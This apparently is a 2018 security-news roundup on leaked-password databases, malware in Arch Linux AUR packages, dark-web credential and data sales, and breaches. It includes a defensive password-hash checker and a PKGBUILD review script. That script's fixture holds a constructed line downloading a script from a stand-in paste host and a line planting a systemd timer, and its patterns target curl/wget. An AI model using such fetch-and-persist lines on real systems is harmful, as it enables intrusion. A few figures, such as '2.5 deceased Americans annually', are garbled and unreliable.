July 14, 2018

Database of 15.6 million hacked passwords available for download on “haveibeenpwned” Website

Many of us wonder whether our email address or passwords have ever been exposed in a breach, but do not know how to check whether we have been a victim of cybercrime.

A website called 'Have I Been Pwned' helps users find out whether their email address or password has ever been exposed in a breach. The website also reveals the number of times your password or email address has been compromised.

Over the years, the website has released several versions of the database, each with more hacked accounts and passwords. The August 2017 version contained 320 million unsafe passwords, and within six months the number had increased to 500 million. The third version, released on July 13, has 15.6 million passwords that have been involved in past data breaches.

The passwords in this database should be treated as unsafe and unreliable: they have already been exposed in past data breaches and could be reused by attackers. If your password appears on the list, change it as soon as possible.

According to the website, the search features for pwned email addresses and pwned passwords are separate: "When email addresses from a data breach are loaded into the site, no corresponding passwords are loaded with them. Separately to the pwned address search feature, the Pwned Passwords service allows you to check if an individual password has previously been seen in a data breach. No password is stored next to any personally identifiable data (such as an email address) and every freely available password is SHA-1 hashed."

The entire database of insecure passwords is freely available for download on the website via two links, a “torrent” link and a “Cloudflare” link; in both, the passwords are stored as SHA-1 hashes.

To check whether your email address has been pwned, just visit the website and type in your email address. Underneath the search bar, it shows how many times your email address has appeared on breached sites and in pastes. It also lists the breaches you were pwned in and the year of each breach.

To check whether your password has been pwned, visit the website's password page and type in your password. Underneath the search bar, you will see how many times your password has appeared in data breaches. From this page you can also download the entire database of insecure passwords.
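
As an added example (not code from the Have I Been Pwned site), here is how a defender can check a password against a local copy of the downloaded SHA-1 list without sending the password anywhere. It assumes the downloaded list holds one upper-case SHA-1 hash and its prevalence count per line, separated by a colon; the sample lines below are constructed, with real digests of two well-known weak passwords and made-up counts.

```python
import hashlib
from typing import Iterable, Iterator, Tuple

# Constructed excerpt in the assumed "SHA1:COUNT" format of the downloadable
# list. The digests are the real SHA-1 hashes of "password" and "123456";
# the counts are invented for this example.
SAMPLE_PWNED_LINES = [
    "5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8:3303003",
    "7C4A8D09CA3762AF61E59520943DC26494F8941B:22390492",
]


def sha1_hex_upper(password: str) -> str:
    """Hash the password the way the list does: SHA-1 of the UTF-8 bytes, upper-case hex."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def parse_pwned_lines(lines: Iterable[str]) -> Iterator[Tuple[str, int]]:
    """Yield (hash, count) pairs, tolerating blank lines and CRLF line endings."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        digest, _, count = line.partition(":")
        yield digest.upper(), int(count)


def pwned_count(password: str, lines: Iterable[str]) -> int:
    """Return how many times the password was seen in breaches (0 if absent).

    The list is streamed line by line, so the full multi-gigabyte download
    never has to sit in memory, and only the hash is compared: the plaintext
    password never leaves this process.
    """
    target = sha1_hex_upper(password)
    for digest, count in parse_pwned_lines(lines):
        if digest == target:
            return count
    return 0


def pwned_count_in_file(password: str, path: str) -> int:
    """Run the same check against the downloaded list on disk."""
    with open(path, "r", encoding="ascii") as fh:
        return pwned_count(password, fh)


if __name__ == "__main__":
    for candidate in ("password", "correct horse battery staple"):
        n = pwned_count(candidate, SAMPLE_PWNED_LINES)
        print(f"{candidate!r}: seen {n} time(s)" if n else f"{candidate!r}: not in list")
```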

July 14, 2018

Malware found in Arch Linux AUR Repository

Malware has been discovered in at least three Arch Linux packages available on the AUR (Arch User Repository), the official Arch Linux repository of user-submitted packages. The malicious code was removed promptly once the AUR team intervened. The incident was possible because the AUR allows users to take over packages that have been abandoned by their original maintainers.

Because the repository consists of user-submitted packages, that is how the malware got in. On Saturday, a user named “xeactor” took over an orphaned package called “acroread”, a PDF viewer, and added malicious code to it.

According to the Git commit, xeactor added code that downloads a script named “~x” from a lightweight pastebin-style service for sharing small text files; that script in turn executes another file named “~u”. The code also tampers with systemd, reconfiguring it so that the script runs every 360 seconds.

The purpose of the second file (~u) was to collect data about each infected system, including the date, time, machine ID, package manager details, CPU information and the output of the “uname -a” and “systemctl list-units” commands, and post these details to a new Pastebin paste using the attacker's own Pastebin API key.

The AUR team also said they found similar code in other packages:

▬ acroread 9.5.5-8
▬ balz 1.20-3
▬ minergate 8.1-2

The malicious changes were reverted and xeactor’s accounts were suspended. AUR packages are user-submitted packages for Arch Linux. There have been several cases this year in which parts of an operating system's code were affected by some kind of malware.

No other malicious actions were observed, meaning the acroread package wasn't harming users' systems, but merely collecting data in preparation for... something else.

Even though it does not pose a serious threat to infected computers, it is anticipated that “xeactor” could have launched further malware, since no self-update mechanism was included.

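
A defender-side check prompted by this incident, added here as an example and not part of the AUR's own tooling: a reviewer heuristic that flags PKGBUILD lines which fetch a URL not declared in source=() (so makepkg never checksums it) or write to a live systemd unit directory instead of under $pkgdir. The PKGBUILD, package name and paste-site URL below are constructed.

```python
import re
from typing import List, Set

# Rule 1: every download must be declared in source=() so makepkg verifies its
#         checksum; curl/wget of an undeclared URL inside a function body is the
#         pattern by which the acroread package pulled in its "~x" script.
# Rule 2: package() may only write under $pkgdir; writing straight into a
#         systemd unit directory on the build host is a red flag.
SOURCE_RE = re.compile(r"^\s*source(?:_\w+)?=\((.*?)\)", re.M | re.S)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
UNIT_DIR_RE = re.compile(r"/systemd/system/")


def declared_sources(pkgbuild: str) -> Set[str]:
    """Collect URLs listed in source=() and source_<arch>=() arrays."""
    urls: Set[str] = set()
    for match in SOURCE_RE.finditer(pkgbuild):
        urls.update(URL_RE.findall(match.group(1)))
    return urls


def review_pkgbuild(pkgbuild: str) -> List[str]:
    """Return one finding per suspicious line; an empty list means nothing flagged."""
    findings: List[str] = []
    declared = declared_sources(pkgbuild)
    for lineno, line in enumerate(pkgbuild.splitlines(), 1):
        code = line.strip()
        if not code or code.startswith("#"):
            continue
        if FETCH_RE.search(code):
            urls = URL_RE.findall(code)
            if not urls or any(u not in declared for u in urls):
                findings.append(f"line {lineno}: download not declared in source=(): {code}")
        if UNIT_DIR_RE.search(code) and "pkgdir" not in code:
            findings.append(f"line {lineno}: writes to a live systemd unit dir: {code}")
    return findings


# Constructed PKGBUILD: one benign install line plus two lines modelled on the
# incident (hypothetical package name and paste-site URL).
SAMPLE_PKGBUILD = """\
pkgname=demo-viewer
pkgver=1.0
source=("https://example.org/${pkgname}-${pkgver}.tar.gz")
sha256sums=('SKIP')

package() {
  install -Dm644 "$srcdir/demo.service" "$pkgdir/usr/lib/systemd/system/demo.service"
  curl -s https://paste.example/raw/abcd -o "$pkgdir/usr/lib/~x"
  echo "[Timer]" > /etc/systemd/system/demo.timer
}
"""

if __name__ == "__main__":
    for finding in review_pkgbuild(SAMPLE_PKGBUILD):
        print(finding)
```
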
July 14, 2018

Criminals selling login credentials for government systems for $10

Top cyber experts claim to have traced a gang of criminals running a dark web market where sensitive login credentials are for sale, suggesting a serious threat to the infosec community worldwide.

During the research, cyber security experts at McAfee discovered that these cybercriminals have recently started selling crucial data and access to many establishments, including premier government sectors, for as little as $10.

The hackers are believed to have obtained these credentials from government and private bodies that use the Microsoft-owned Remote Desktop Protocol without strong passwords, which continues to give the researchers more ground to widen their studies.

The experts have confirmed a steep rise in the use of RDP by cybercriminals, since it makes it easy for them to cover their tracks while the protocol gives them access to remote machines.

Most striking, the hackers sold access to vital automated security systems owned by one of the top airports, and the deal on the dark web market fetched them around $10; further investigation is needed to establish the modus operandi.

More and more startling revelations are surfacing about the dark web market and the RDP shops connected with it.

The shops in question are selling access to numerous hacked systems, including Windows 10, Windows XP and more. What is more disturbing is that many government bodies and renowned private organisations keep procuring RDP access.

Such access is commonly needed in the medical and healthcare sectors, which are well connected to these RDP shops. The shops are full of credit card, data card and social security access for sale, to the benefit of attackers who thereby gain easy access to administrative systems.

They carry out malicious activities without running much risk and are often not prosecuted.

The researchers are of the view that these schemes will not die down so long as fragile RDP deployments are allowed to remain. The need of the hour, they say, is system administration that is tightly coupled with the remote access mechanism.

July 13, 2018

Google Chrome to get revamped soon

Google Chrome, the world's most used internet browser, is being redesigned to make it faster and more secure.

Google announced this week that it has now built robust security technologies into Chrome to safeguard against the Spectre vulnerabilities, which its own researchers brought to light at the beginning of 2018.

Chrome 67 has a Site Isolation feature that is enabled by default for all Chrome users, but the drawback is that it increases memory usage, which will be a problem for users with devices having 4GB of RAM or less.

However, the company has promised to work on reducing the impact of the Site Isolation technology. "Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure," Reis added.

According to the company, Site Isolation has been enabled for 99% of Chrome users on Windows, Mac, Linux, and Chrome OS. For the remaining users it was left off in order to "monitor and improve performance".

Now it will be interesting to see how users react once Chrome 68 is launched later this month. Users will be able to check whether Site Isolation is turned on by typing chrome://process-internals into the address bar, but this does not work in Chrome 67.

"We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes," Reis writes in his blog. "Stay tuned for an update about this enforcement."

July 12, 2018

Hacker Sold US Air Force Drone Documents on Dark Web for $150

While tracking criminal activity on dark web marketplaces, Insikt Group, the threat intelligence team of the security research firm Recorded Future, discovered a hacker selling classified military documents for the meager sum of $150-200 on a deep web and dark web forum.

According to the research team, the hacker got hold of the documents by exploiting an FTP vulnerability in Netgear routers that has been known for two years.

Once the hacker had access to the router, the intruder was easily able to get into a captain’s personal computer and steal a cache of sensitive documents. “While such course books are not classified materials on their own,” Recorded Future said, “in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts.”

The documents also contained sensitive materials, like “the M1 Abrams maintenance manual, a tank platoon training course, a crew survival course, and documentation on improvised explosive device (IED) mitigation tactics.”

The captain from whose computer all the documents were stolen had just completed a cyber safety course in February and “should have been aware of the required actions to prevent unauthorized access,” Recorded Future said.

Meanwhile, US law enforcement has started its investigation but has not revealed who is behind the breach. Researchers at Insikt Group insist that the alleged hacker is from South America, though they did not provide any further information.

July 12, 2018

Cybercriminals sell deceased patients’ record on Dark web

Despite best efforts, stolen medical records (of the living) for sale on black markets remain a huge problem. In fact, Cynerio is still seeing continued growth in the number of patient medical record breaches resulting from hacking and unauthorized access to healthcare systems.

Meanwhile, as more medical records hit the black market, the value of the stolen data has declined. The reason is simple: supply and demand. Even so, medical records are generally worth significantly more than stolen credit card data.

Recently, Cynerio has detected an interesting new wrinkle in the sale of stolen medical data on the dark web. The research team found a post from a vendor on the dark web offering the medical records of the deceased. In this dark web listing, the vendor mentions that 60,000 of the stolen medical records available for purchase include the individual's date of death.

It may come as a surprise that fraudsters would be interested in purchasing the medical records of patients who are already deceased, but there is a reason for this. When it comes to identity theft or running up fraudulent charges, there is no better victim than one who can’t file a complaint. If the person whose identity is used for the fraud is deceased, it may go unnoticed for a long time.

According to a past AARP Bulletin, fraudsters attempt to steal the identities of 2.5 deceased Americans annually in an attempt to open credit card accounts, apply for loans, commit tax fraud and obtain expensive mobile phones via carrier contracts.

The above are the most common forms of fraud tied to identity theft of the deceased. Medical records, however, are often used in combination with other personal information to conduct even more sophisticated fraudulent transactions.

Besides financial fraud, criminals also use stolen medical information to illegally acquire medical supplies and obtain health insurance. On one dark web forum, the researchers found criminals explaining to a potential customer how a medical ID can be used to get prescription drugs delivered, to order medication and even to book a doctor’s appointment for a check-up.

July 12, 2018

Timehop Data Breach Affects 21 Million Users

Timehop, an add-on app that reminds people of their old posts on different social media platforms, suffered a data breach on July 4th that affected 21 million users.

The stolen data includes names, email addresses, dates of birth, and the phone numbers of over 4.7 million users who had linked them to their accounts. However, users’ old social media posts ("memories") were not compromised.

The hackers were able to get into Timehop’s cloud computing account, which was not protected by multi-factor authentication; from there they transferred the data and attacked its database.

According to the company, it noticed the breach within two hours of it starting and was able to interrupt it, but user data had already been stolen. Users’ private messages, financial data, social media content, and Timehop data were not affected.

“That stuff is what we cared about, that stuff was protected,” Timehop’s COO Rick Webb said in an interview with TechCrunch. “We have to make a mental note to think about everything else” going forward.

The company has enabled two-factor authentication on its internal systems and is encrypting its databases to prevent future breaches.

July 10, 2018

Former NSO employee attempts to sell stolen hacking tool on Dark web

NSO is an Israeli cybersecurity contractor and software developer that specialises in helping governments monitor adversaries using spyware. Recently, a former employee, whose name is being withheld by the authorities, allegedly stole NSO’s cyber technology, spying tools and software with the intention of selling them on the dark web for $50 million, which could have harmed state security, Israel’s Justice Ministry said.

The staff member stole Pegasus spyware code and attempted to sell it.

The 38-year-old senior programmer was fired on suspicion of stealing valuable data from the company. Upon investigation it was found that he had a hard drive with the contents of the company’s servers and proprietary tools stored on it, a ministry statement said on July 5. It was found under his bed when the authorities raided his house.

The company is very strict about its data policy because many of its technologies are sensitive, such as the Pegasus software, which is delivered via SMS and can extract WhatsApp data, messages and social media data, and even take control of a smartphone’s camera to spy on the user.

The ministry said the accused, who was hired in November 2017, was called in for a hearing by NSO on 29 April before his dismissal, after which he downloaded software and information worth hundreds of millions of dollars.

NSO Group, like many cybersecurity firms, had protections in place to prevent the external transfer of its intellectual property and software. The employee's role gave him access to the firm's servers, tools, and source code, but he was still subject to the same restrictions.

The hacker's attempt to steal the data and sell it on the dark web in exchange for cryptocurrency backfired because the prospective buyer himself tipped off NSO. He was apprehended by the Lahav 433 serious crime unit and the stolen data wasn’t sold. The statement did not identify the person who contacted the former NSO employee.

July 10, 2018

New Botnet posing threat to internet devices

A one-year-old botnet is shaking up the cyber world, forcing security experts to counter a deepening threat.

Popularly known as Hide-N-Seek, the botnet is being deployed by attackers to target Internet of Things devices within a short space of time.

In less than a year since experts identified it, HNS was said to have infected many Internet of Things devices, leaving users in great confusion.

In addition, the attackers might in all probability use the botnet to target the databases of cross-platform solutions, to the worry of millions of internet users.

A joint team of experts from two top cyber security firms, who are conducting an extensive study, have observed that the Hide-N-Seek botnet, now positioned to exploit database systems, has expanded its network to infect more devices beyond the scope of routers.

The researchers, drawn from Qihoo 360 and Netlab, have said the Hide-N-Seek botnet is being deployed with new exploits: Cisco Linksys router RCE, JAWS/1.0 RCE, OrientDB RCE, TP-Link router RCE, Netgear RCE and AVTECH RCE.

They say the botnet has substantial processing power, given its capacity to scan for several exploitable services.

These include Telnet on port 23, HTTP web services on ports 8080 and 80, CouchDB on port 5984 and OrientDB on port 2480. HNS supports 7 exploit methods and adds a cpuminer mining program, though its functioning is quite improper.

The researchers have found it very easy to identify the Hide-N-Seek botnet, which, like others, keeps infecting popular OrientDB servers.

Among the infected services are the JAWS/1.0 web server, Apache CouchDB, OrientDB, AVTECH devices (webcams) and Cisco Linksys routers.

The experts have categorically stressed the need for more research to weed out the threat in store.

July 09, 2018

Hackers steal 600 gallons of fuel from a US gas station

We have read about credit card skimmers at ATMs and gas stations, but how would someone hack fuel pumps to steal gas? Judging from recent hacks and data breach incidents, hackers have changed their targets. Apparently, cybercriminals have got their hands on a high-tech electronic device that allows them to steal gasoline from fuel pumps without getting caught. These hackers hacked a US gas station to pilfer 600 gallons of gas worth $1,800, and did so brazenly in the middle of the day.

The Detroit police department is looking for two men suspected in the larceny of fuel from a Marathon Oil Service Station in the 17800 block of W. Seven Mile on the city's west side.

The Marathon gas station suffered the attack at around 1pm on June 23, 2018, when two men pulled up to the pump for fuel. Reportedly, they took control of the pump through a remote device, which prevented the clerk at the station from blocking the hack from his system.

Anyone who recognises the suspects is asked to call DPD's Eighth Precinct.

According to Fox2Detroit, the clerk, Aziz Awadh, said about the incident, “I tried to stop it here from the screen but the screen’s not working. I tried to stop it from the system; nothing working.”

Awadh said that he was able to shut down the pump only after he found the emergency kit. He then called the police. By then, however, the hackers had managed to drain a large volume of fuel.

In a statement, Dontae Freeman, Detroit police spokesman told FOX that “the suspects had about 10 large vehicles lined up at the pump and filled their tanks with gas. He said investigators believe it took the suspects about 90 minutes to fill up the vehicles.”